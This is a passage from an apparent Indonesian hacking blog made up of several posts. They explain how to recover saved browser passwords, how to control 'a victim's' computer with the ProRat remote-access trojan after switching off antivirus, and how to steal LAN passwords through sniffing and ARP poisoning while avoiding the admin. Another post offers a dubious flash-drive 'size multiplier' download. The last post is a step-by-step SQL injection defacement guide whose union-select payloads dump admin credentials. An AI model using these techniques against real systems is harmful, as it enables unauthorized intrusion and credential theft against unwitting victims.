3. Jalankan File MPR.exe dengan meng-kliknya dua kali.

Jendela Multi Password Recovery, menampilkan informasi seperti Windows Explorer. Klik Password Audit, maka akan tampil account-account yang lemah. Pada folder Browser, MPR akan menampilkan password yang di peroleh dari hasil catatan Browser.

Cara Antisipasi
Untuk mengantisipasi pencurian password melalui teknik di atas, lakukan pembersihan Cookie usai melakukan penjelajahan di internet. Jika komputer terinstall DeepFreeze, kita hanya perlu merestartnya. Jika tidak, lakukan langkah berikut :

Pada Mozilla Firefox pilih menu Tools >> Clear Private Data. Centang kolom “Cookies” lalu tekan tombol “Clear Private Data Now”.

Pada Windows Explorer (Internet Explorer Versi 7), pilih menu Tools >> Delete Browsing History, lalu klik pada tombol “Delete Cookies”.

Pada Opera Browser, pilih Tools >> Delete Private Data lalu klik pada tombol “Delete”

Pada Google Chrome Browser, pilih Tools/Setting >> Clear Browsing Data lalu klik pada tombol “Clear Browsing Data”


Sumber : Disini

Read More ->>

Meremote komputer orang dengan Software ProRat

                             THE DARK OF LIFE

Meremote komputer, inilah yang sangat digemari oleh orang awam seperti saya ini.

Meremote komputer disini maksudnya adalah mengendalikan komputer jarak jauh dengan komputer yang berbeda. Jadi kita bisa melakukan aktivitas untuk menggunakan mouse dan keyboard dengan lokasi komputer yang berbeda. Misalnya Anda ingin mengendalikan komputer kantor dari komputer/laptop di rumah hanya dengan koneksi internet.

yang dibutuhkan, hanyalah :

1. tool Advanced Ports Scanner
tool ini hanya dibutuhkan untuk mengetahui alamat IP dan Port sang korban.
bisa didownload di sini.

2. tool Prorat
aplikasi inilah yang bisa digunakan untuk meremote komputer orang lain.
kunjungi disitus resminya http://www.prorat.net
untuk tool ini bisa anda download langsung klik disini
password rar : "pro"

Sebelumnya dimatikan dulu Anti Virus kamu (disable) untuk menggunakan tool ProRat ini,
karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi
komputer kita.

untuk cara menggunakannya.
mungkin saya tidak menerangkannya disini, karena kenapa?
karena seharusnya anda download dahulu e-book cara menggunakan aplikasi / tool ProRat ini yang saya dapatkan dari ilmukomputer.org dari pembuat aslinya yang menerapkan trik ini.

e-book ini bisa anda download klik disini atau anda bisa download melalui situs http://ilmukomputer.org/2009/06/13/hacking-with-prorat/

oke. selamat mencoba . . .


referensi :
- ilmukomputer.com

#Down_Crootz

Read More ->>

Cara Hacking Di LAN (Local Area Network)

Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing) Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu/semua komputer pada network anda.

Kelebihan:

• Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada system jaringan bukan pada komputernya
• Bisa mencuri semua jenis login password yang melalui server HTTP
• Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
• Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
• Semua programnya free

Kekurangan:

• Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
• Ketahuan/tidak, oleh admin jaringan di luar tanggung jawab. Jadi jangan sampai ketahuan yach, bisa berantem jadinya.

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

• Komputer Korban
• Komputer Hacker
• Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
dah ye langsung aje kita praktekin :D
Langkah-langkah pertama:

• Cek tipe jaringan anda, anda ada di jaringan switch/hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
• Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.

Wireshark : disini

Cain & Abel : disini

Cara Menggunakan WireShark:
Pada artikel sebelumnnya pun saya sudah pOsting yaitu Cara Menggunakan Cain & Able dengan wireshark,Melanjtkan saja yaitu :

• Jalankan program wireshark
• Tekan tombol Ctrl+k (klik capture lalu option)
• Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
• Klik tombol start
• Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
• Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
• Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
• Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

Pada artikel sebelumnya juga saya sudah posting Cara Menggunakan Cain & Able,

• Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
• Bukan program Cain anda
• Klik pada bagian configure
• Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
• Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
• Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
• Setelah itu apply settingannya dan klik ok
• Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
• Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
• Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
• Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
• Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
• Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
• Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
• Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
• Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
• Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini).

Read More ->>

Software Pengganda Size FlashDisk

Oke Bray ^_^
Langsung aje Gak usah Banyak Basa2
Sesuai aje ama judulnye ^_^

Software Pengganda Size Flashdisk

^_^
ya nih software Berguna buat nambahin size flashdisk Kalian
walaupun cuma sesuai dengan kelipatannya aja ^_^
tapi gpp Lah lumayan juga ^_^
daripada beli :p
Wkakwak

langsung aje di sedot

The Dark Of Life

Download

Pwnya : gayhodus

                             The Dark Of Life

Read More ->>

Deface With SQLI ( SQL INJECTION )

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

Dork Di google banyak :p


===========
=step Satu:=
===========

carilah target
misal:

Code:

[site]/berita.php?id=100



Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:

Code:

[site]/berita.php?id=100' atau
[site]/berita.php?id=-100



sehingga muncul pesan error.


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:

Code:

[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*



ceklah secara step by step (satupersatu)...
misal:

Code:

[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--



sehingga muncul error atau hilang pesan error...
misal:

Code:
[site]/berita.php?id=-100+order+by+9--



berarti yang kita ambil adalah sampai angka 8
menjadi :

Code:

[site]/berita.php?id=-100+order+by+8--




===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka:

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--



ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--



lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah

Code:
From+Information_schema..




============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--


seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--



=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--



pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :


contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--



============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--



contoh kata yang keluar adalah id,username,password

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--



==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login :piss: tapi saya sarankan memakai schemafuzz.py untuk hasil yg lebih maksimal.


agak Rumit Ye ^_^
namanya juga SQLI  skill Mu :p

                  THE DARK OF LIFE ^_^

Read More ->>